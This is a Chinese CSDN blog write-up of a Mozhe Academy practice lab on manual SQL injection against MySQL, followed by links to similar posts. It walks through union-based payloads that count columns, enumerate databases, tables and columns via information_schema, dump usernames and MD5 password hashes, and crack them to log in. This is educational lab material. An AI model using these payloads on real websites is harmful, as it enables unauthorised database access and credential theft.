墨者学院SQL手工注入漏洞测试(MySQL数据库)

最新推荐文章于 2023-06-16 09:43:27 发布
最新推荐文章于 2023-06-16 09:43:27 发布
阅读量433 收藏 2
点赞数 2
分类专栏: ctf 文章标签: 网络安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lakers248_/article/details/124769591
版权

打开靶机发现有个可点击的链接

 

测试是否存在sql注入

1 and 1=1 正常
1 and 1=2 错误
//故而存在sql注入

1.判断字段

order by语句

order by 1,2,3,4,5 判断到5时候报错,即有四个字段

2.报错看回显

?id=-1 union select 1,2,3,4
//这里把id改成=-1就是为了让其报错,找不到这个id,执行后面的联合查询即可看到回显

3.尝试查询

数据库名:database()

数据库版本:version()

?id=-1 union select  1,database(),version(),4

得到数据库名字:  mozhe_Discuz_StormGroup

 看到版本为5.7,属于高版本(5.0以上) 可以尝试 information_schema 

information_schema,它是一个存储记录有所有数掘库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或列名信息。

4.尝试查询该库下的表

table_name:表名

table_schema:库名

?id=-1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema = '库名'

看到有两个表

5.查找指定库下列名

column_name:列名

id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name = '表名'

得到列名

6.尝试查找数据

?id=-1 union select 1,2,group_concat(id,name,password),4 from 表名

 

 mozhe后面32位,应该是md5,解密得到密码

有两个密码,均尝试一下 有一个可以登录进去

即可得到key

Farii
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院 - SQL手工注入漏洞测试(Access数据库)
多崎巡礼的博客
07-26 943
进入公告找到注入点 地址输入 and 1=1 =1正常,and 1=2 出现报错说明有注入点。 3.猜测存在的表,and exists (select * from admin),我这里凭借着经验猜出来是admin表,如果不是的话可以继续猜,格式为:and exists (select * from 表名),运行不报错,说明就是存在这个admin表了。 4.猜测这个表里面有哪些字段:order ...
墨者学院SQL手工注入漏洞测试(MySQL数据库)
Chris_HackFromCN的博客
08-12 659
Do what you said,say what you can do 做你说过的,说你能做的 关于手工注入,网上已经有很多教程,本文讲解的是使用SQLmap工具来对该关卡进行注入,最后找到key。 首先打开靶场环境,可以看到用户登录的场景,里面包含账号和密码两个输入框。 对账号密码输入框进行注入测试,但都不成功,此时发现在登录按钮下面有一条维护通知,于是点进去.... 3. 如上图所示,进入到维护通知页面之后,发现其URL地址栏带有参数id,猜测该参数可能是注...
墨者学院SQL手工注入漏洞测试(MySQL数据库-字符型)
Fisher
12-02 691
写在前面: 最近准备从头再来过一遍sql,所以开始刷墨者学院的题目。 这是一道最简单的字符型 联合注入题目 目的:拿到用户与密码 首先寻找注入点,我们发现在维护界面存在id字段可能存在注入。 1.找闭合字符 首先尝试寻找闭合字符,当输入‘时界面加载正确 可能是’,接着测试 and 1=1 界面正确,and1=2 界面错误 没错说明确实闭合字符是单引号。 当然需要–+起到闭合后面闭合字符的作用。 接下来用order by 判断有多少列 order by 1时正确 order by 5 时错误说明共4列
墨者学院--SQL手工注入漏洞测试(Access数据库)
YYYYYcici的博客
05-18 869
墨者学院SQL手工注入漏洞测试(Access数据库) 靶场连接: 解题思路: 判断是否存在sql注入 利用order by判断字段数量 联合注入猜测表名 联合注入猜测列名 登陆,拿KEY 打开题目,页面如下所示 一、 点击蓝色划线区域,跳转下一正常页面(跳转页面出现id=1) 二、判断存在注入(/ 、-0 、 and 1=1) 三、判断字段数量(order by...
墨者学院——SQL手工注入漏洞测试(MySQL数据库)》
weixin_47118413的博客
06-21 2357
背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
墨者未必黑.pdf
12-26
墨者未必黑.pdf
墨者安全专家 v3.7.2.9
03-12
3、墨者漏洞修补 通过全面扫描windows和软件中存在的系统漏洞,一键完成补丁的下载与安装,及时排除系统的安全隐患。 4、墨者保护隐私 及时清理上网历史记录、网银注册信息、系统临时文件及cookies等,全面保护个人...
墨者学院SQL手工注入漏洞测试全过程(MySQL数据库)
algae
04-12 494
墨者 - SQL手工注入漏洞测试(MySQL数据库-字符型)
吃肉唐僧的博客
07-06 616
字符型,其实与数字型得注入思路没什么区别,只不过需要注意构造单引号和后面加注释就行了 id=tingjigonggao' order by 1-- 测试 字段个数,发现有4个 试过盲猜表,admin,manger,失败 老老实实暴库,先测回显位置 id=tingjigongga' union select '1','2','3','4' -- /new_l...
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
m0_73681638的博客
06-16 294
通常 Sql 注入漏洞分为 2 种类型:数字型,字符型。数字型判断:在加载好的Url 地址中输入and 1=1,页面依旧运行正常,继续进行下一步。断网页是否存在sql注入使用单引号判断法:在参数后面加上单引号, 原因为无论字符型还是整型都会 因为单引号个数不匹配而报错。使用火狐插件—hackbar,加载出当前界面的url,使用单引号判断法,页面返回错误,存在 Sql 注 入。
墨者学院04 SQL手工注入漏洞测试(Sql Server数据库)
weixin_42789937的博客
01-25 314
墨者学院04 SQL手工注入漏洞测试(Sql Server数据库),熟悉的配方,熟悉的味道~
墨者靶场 入门:SQL手工注入漏洞测试(Access数据库
qq_43233085的博客
01-10 1181
入门:SQL手工注入漏洞测试(Access数据库)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Access,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Access的数据结构; 4.了解字符串的MD5...
墨者学院-SQL注入漏洞测试(报错盲注)
weixin_42939822的博客
03-30 5117
墨者学院-SQL注入漏洞测试(报错盲注)
SQL注入操作流程及实例演示+墨者学院靶场SQL手工注入漏洞测试(MySQL数据库)
ran的博客
01-12 1672
MYsQL5.0以上版本中,Mysql 有一个系统数据库 information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,相当于利用该表可以进行一次完整的注入,通过查询它获取指定数据库下面的表名、列名、具体数据信息。当输入了一些乱七八糟的内容之后,网页返回“404错误”或者进行了跳转,则说明本网站对输入的内容可能有检测,则说明这个网站大概率没有注入漏洞。返回的了两个数字,分别是“2”、“3”,因此,修改网址上的“2”、“3”为对应系统函数来进行信息收集。可以在参数值前加“-”;
墨者学院-入门级-SQL手工注入漏洞测试(MySQL数据库)-小白必看(超详细)
kitiu666的博客
04-26 1020
2021年2月2日,第八次渗透测试。 这次实践SQL的盲注,知识点比较多,除了实验的讲述还会加上知识点的讲解; 测试寻找注入口: 1,、进入靶场,发现界面和之前做过的实验一样,我们需要进入“维护通知的地址”进行说起来的注入; 2、我们直接进在地址栏进行SQL语句的注入测试; 在地址栏加上语句“and 1=1”,页面可以正常显示。再尝试加入语句“and 1=2”,页面显示出错,没有了相关内容。说明地址栏是一个sql 的一个注入口;(原理说明可以看我之前做过的实验博客) sql语句注入: 3、发现了注入
墨者学院 - SQL手工注入漏洞测试(PostgreSQL数据库)
多崎巡礼的博客
08-20 3264
postgreSQL注入mysql注入语法是类似的,有一点小的差异: postgreSQL查询当前数据库使用:current_database()函数; 在pg_stat_user_tables库查询表名,使用relname关键字; 和MySQL的limit使用有差异,语法为limit 1 offset 0。     手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值